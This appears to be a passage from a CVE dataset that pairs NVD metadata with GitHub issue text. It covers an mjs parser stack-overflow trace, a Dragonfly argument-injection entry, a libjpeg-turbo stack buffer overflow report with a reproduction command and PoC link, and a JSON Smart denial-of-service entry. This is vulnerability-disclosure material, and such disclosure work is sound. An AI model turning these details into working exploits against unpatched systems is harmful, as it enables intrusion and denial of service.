/home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #131 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #132 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #133 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #134 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #135 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #136 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #137 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #138 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #139 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #140 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #141 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #142 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #143 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #144 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #145 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #146 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #147 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #148 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #149 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #150 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #151 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #152 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #153 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #154 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #155 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #156 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #157 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #158 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #159 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #160 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #161 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #162 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #163 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #164 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #165 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #166 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #167 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #168 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #169 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #170 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #171 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #172 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #173 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #174 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #175 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #176 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #177 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #178 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #179 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #180 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #181 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #182 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #183 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #184 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #185 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #186 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #187 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #188 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #189 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #190 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #191 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #192 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #193 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #194 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #195 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #196 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #197 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #198 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #199 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #200 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #201 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #202 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #203 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #204 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #205 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #206 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #207 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #208 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #209 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #210 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #211 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #212 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #213 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #214 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #215 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #216 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #217 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #218 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #219 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #220 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #221 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #222 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #223 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #224 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #225 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #226 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #227 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #228 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #229 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #230 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #231 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #232 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #233 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #234 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #235 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #236 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #237 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #238 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #239 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #240 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #241 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #242 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #243 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #244 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #245 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #246 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #247 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #248 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #249 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #250 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #251 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #252 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #253 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #254 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #255 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #256 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #257 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #258 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #259 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #260 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #261 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #262 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #263 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #264 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #265 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #266 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #267 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #268 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #269 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #270 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #271 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #272 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #273 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #274 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #275 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #276 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #277 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #278 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #279 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #280 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #281 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #282 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #283 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #284 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #285 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #286 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #287 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #288 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #289 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #290 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #291 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #292 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #293 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #294 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #295 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #296 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #297 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #298 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 SUMMARY: AddressSanitizer: stack-overflow /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12117:25 in findtok ==23779==ABORTING ```
AddressSanitizer: stack-overflow on recursive stack frames: parse_unary, parse_mul_div_rem, parse_plus_minus...
https://api.github.com/repos/cesanta/mjs/issues/136/comments
1
2019-05-28T07:28:05Z
2019-05-31T12:47:52Z
https://github.com/cesanta/mjs/issues/136
449,105,468
136
2,007
CVE-2021-33564
2021-05-29T14:15:08.510
An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/markevans/dragonfly/issues/513" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mlr0p/CVE-2021-33564" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-33564.yaml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/markevans/dragonfly/issues/513" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mlr0p/CVE-2021-33564" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-33564.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "4D749862-E6F3-45CA-8A67-EBF365A2148B", "versionEndExcluding": "1.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "88" ]
88
https://github.com/markevans/dragonfly/issues/513
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "markevans", "dragonfly" ]
Hello, we have discovered a security issue within this project. Do you have a preferred security contact that we could reach out to discuss this issue? Thank you very much!
Security Issue Report
https://api.github.com/repos/markevans/dragonfly/issues/513/comments
1
2021-04-28T23:40:59Z
2021-04-29T08:07:49Z
https://github.com/markevans/dragonfly/issues/513
870,486,468
513
2,008
CVE-2020-17541
2021-06-01T15:15:07.417
Libjpeg-turbo all version have a stack-based buffer overflow in the "transform" component. A remote attacker can send a malformed jpeg file to the service and cause arbitrary code execution or denial of service of the target service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/121.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cwe.mitre.org/data/definitions/121.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libjpeg-turbo:libjpeg-turbo:*:*:*:*:*:*:*:*", "matchCriteriaId": "015A9E46-D87A-474E-9E74-B764FB4EBACC", "versionEndExcluding": "2.0.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libjpeg-turbo", "libjpeg-turbo" ]
There' s a stack buffer overflow in encode_one_block function, the backtrace of the crash point is below. The version is the latest from the git main branch: ``` ./jpegtran-static -transverse ~/Desktop/poc.jpg ``` ``` ================================================================= ==11652==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd03285910 at pc 0x00000051103c bp 0x7ffd03285700 sp 0x7ffd032856f0 WRITE of size 1 at 0x7ffd03285910 thread T0 #0 0x51103b in encode_one_block /home/zwjj/research/libjpeg-turbo/jchuff.c:600 #1 0x51103b in encode_mcu_huff /home/zwjj/research/libjpeg-turbo/jchuff.c:684 #2 0x475668 in compress_output /home/zwjj/research/libjpeg-turbo/jctrans.c:349 #3 0x4443da in jpeg_finish_compress /home/zwjj/research/libjpeg-turbo/jcapimin.c:186 #4 0x404e14 in main /home/zwjj/research/libjpeg-turbo/jpegtran.c:581 #5 0x7fbfb2ed182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x405a58 in _start (/home/zwjj/research/libjpeg-turbo/jpegtran-static+0x405a58) Address 0x7ffd03285910 is located in stack of thread T0 at offset 384 in frame #0 0x4d839f in encode_mcu_huff /home/zwjj/research/libjpeg-turbo/jchuff.c:648 This frame has 2 object(s): [32, 88) 'state' [128, 384) '_buffer' <== Memory access at offset 384 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/zwjj/research/libjpeg-turbo/jchuff.c:600 encode_one_block Shadow bytes around the buggy address: 0x100020648ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100020648ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100020648af0: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 f4 f2 f2 0x100020648b00: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100020648b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100020648b20: 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 0x100020648b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100020648b40: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 0x100020648b50: 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x100020648b60: f4 f4 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 0x100020648b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==11652==ABORTING ``` [poc](https://drive.google.com/file/d/1b_1RmtUG4NYUFYAmfRpECliJ-AoIExMD/)
report a stack buffer overflow security issue
https://api.github.com/repos/libjpeg-turbo/libjpeg-turbo/issues/392/comments
1
2019-12-05T13:46:42Z
2019-12-05T21:44:58Z
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392
533,361,771
392
2,009
CVE-2021-31684
2021-06-01T20:15:08.480
A vulnerability was discovered in the indexOf function of JSONParserByteArray in JSON Smart versions 1.3 and 2.4 which causes a denial of service (DOS) via a crafted web request.
